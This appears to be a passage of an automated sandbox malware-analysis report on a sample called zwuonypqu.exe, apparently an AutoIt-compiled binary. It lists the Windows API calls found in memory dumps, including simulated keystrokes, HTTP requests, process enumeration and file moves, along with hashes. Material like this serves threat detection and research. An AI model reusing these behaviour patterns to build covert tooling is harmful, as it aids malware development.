                        • CharNextW.USER32(00000000), ref: 00456034
                        • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456060
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$_wcslen$CharLongNextWindow_memset
                        • String ID:
                        • API String ID: 2321321212-0
                        • Opcode ID: 56a67735f7a5bb8cc0a1c357c9749c25dc37e6f8b8df9cef775033d7e934ef4e
                        • Instruction ID: 728fd5b54b682decfcd50b06f9b7fb359c8698431e162ed45c662fcf507213b6
                        • Opcode Fuzzy Hash: 56a67735f7a5bb8cc0a1c357c9749c25dc37e6f8b8df9cef775033d7e934ef4e
                        • Instruction Fuzzy Hash: 5D41D172204241ABE3108F68DC45BABB7E4FB84321F004A2EF954D72D1E7B9904A8B66
                        APIs
                          • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                          • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32(00000000,?,00000001,00478FA7), ref: 00445964
                          • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001), ref: 0044596B
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                        • PostMessageW.USER32 ref: 00445D35
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                        • PostMessageW.USER32 ref: 00445D66
                        • Sleep.KERNEL32(00000000), ref: 00445D70
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                        • PostMessageW.USER32 ref: 00445D8B
                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                        • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                        • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                        • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressProc_malloc$_strcat_strlen
                        • String ID: AU3_FreeVar
                        • API String ID: 2184576858-771828931
                        • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                        • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                        • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                        • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                        • DestroyWindow.USER32 ref: 0042A751
                        • UnregisterHotKey.USER32(?), ref: 0042A778
                        • FreeLibrary.KERNEL32(?), ref: 0042A822
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 4174999648-3243417748
                        • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                        • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                        • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                        • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                        • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                        • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                          • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                        • String ID:
                        • API String ID: 1291720006-3916222277
                        • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                        • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                        • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                        • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorLastselect
                        • String ID: HH
                        • API String ID: 215497628-2761332787
                        • Opcode ID: 10c7b2fdb40d70863cd7cf81ede4415bec4f88d5225a7afe2b6b62fd6fe533cb
                        • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                        • Opcode Fuzzy Hash: 10c7b2fdb40d70863cd7cf81ede4415bec4f88d5225a7afe2b6b62fd6fe533cb
                        • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __snwprintf__wcsicoll_wcscpy
                        • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                        • API String ID: 1729044348-3708979750
                        • Opcode ID: d504a39e3b85aa042b454773e4b791f90fae78cdff70d0edbc70f8b40f51964b
                        • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                        • Opcode Fuzzy Hash: d504a39e3b85aa042b454773e4b791f90fae78cdff70d0edbc70f8b40f51964b
                        • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                        APIs
                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,?,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,004A8E80,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,0040F3D2), ref: 0040FFCA
                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                        • MoveFileW.KERNEL32 ref: 0044BC38
                        • _wcscat.LIBCMT ref: 0044BCAA
                        • _wcslen.LIBCMT ref: 0044BCB7
                        • _wcslen.LIBCMT ref: 0044BCCB
                        • SHFileOperationW.SHELL32 ref: 0044BD16
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                        • String ID: \*.*
                        • API String ID: 2326526234-1173974218
                        • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                        • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                        • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                        • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                        APIs
                          • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                        • _wcslen.LIBCMT ref: 004366DD
                        • GetFileAttributesW.KERNEL32(?), ref: 00436700
                        • GetLastError.KERNEL32 ref: 0043670F
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                        • _wcsrchr.LIBCMT ref: 0043674C
                          • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                        • String ID: \
                        • API String ID: 321622961-2967466578
                        • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                        • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                        • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                        • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 1038674560-2734436370
                        • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                        • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                        • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                        • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                        APIs
                        • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                        • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                        • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                        • __wsplitpath.LIBCMT ref: 00436FA0
                        • _wcscat.LIBCMT ref: 00436FB2
                        • __wcsicoll.LIBCMT ref: 00436FC4
                        • CloseHandle.KERNEL32(00000000), ref: 00437003
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                        • String ID:
                        • API String ID: 2903788889-0
                        • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                        • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                        • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                        • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                        APIs
                        • DeleteObject.GDI32(?), ref: 0044157D
                        • GetDC.USER32(00000000), ref: 00441585
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                        • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                        • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                        • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                        • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 004140E1
                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                        • ___fls_getvalue@4.LIBCMT ref: 004140EC
                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                        • ___fls_setvalue@8.LIBCMT ref: 004140FF
                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                        • ExitThread.KERNEL32 ref: 0041410F
                        • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00414115
                        • __freefls@4.LIBCMT ref: 00414135
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                        • String ID:
                        • API String ID: 1925773019-0
                        • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                        • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                        • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                        • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                        APIs
                        • VariantClear.OLEAUT32(00000038), ref: 004357C3
                        • VariantClear.OLEAUT32(00000058), ref: 004357C9
                        • VariantClear.OLEAUT32(00000068), ref: 004357CF
                        • VariantClear.OLEAUT32(00000078), ref: 004357D5
                        • VariantClear.OLEAUT32(00000088), ref: 004357DE
                        • VariantClear.OLEAUT32(00000048), ref: 004357E4
                        • VariantClear.OLEAUT32(00000098), ref: 004357ED
                        • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                        • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                        • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                        • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                        APIs
                        • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                          • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                        • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                        • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                        • _memset.LIBCMT ref: 00464B92
                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                        • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                        • WSACleanup.WSOCK32 ref: 00464CE4
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                        • String ID:
                        • API String ID: 3424476444-0
                        • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                        • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                        • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                        • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                        APIs
                        • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                        • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                        • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                        • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
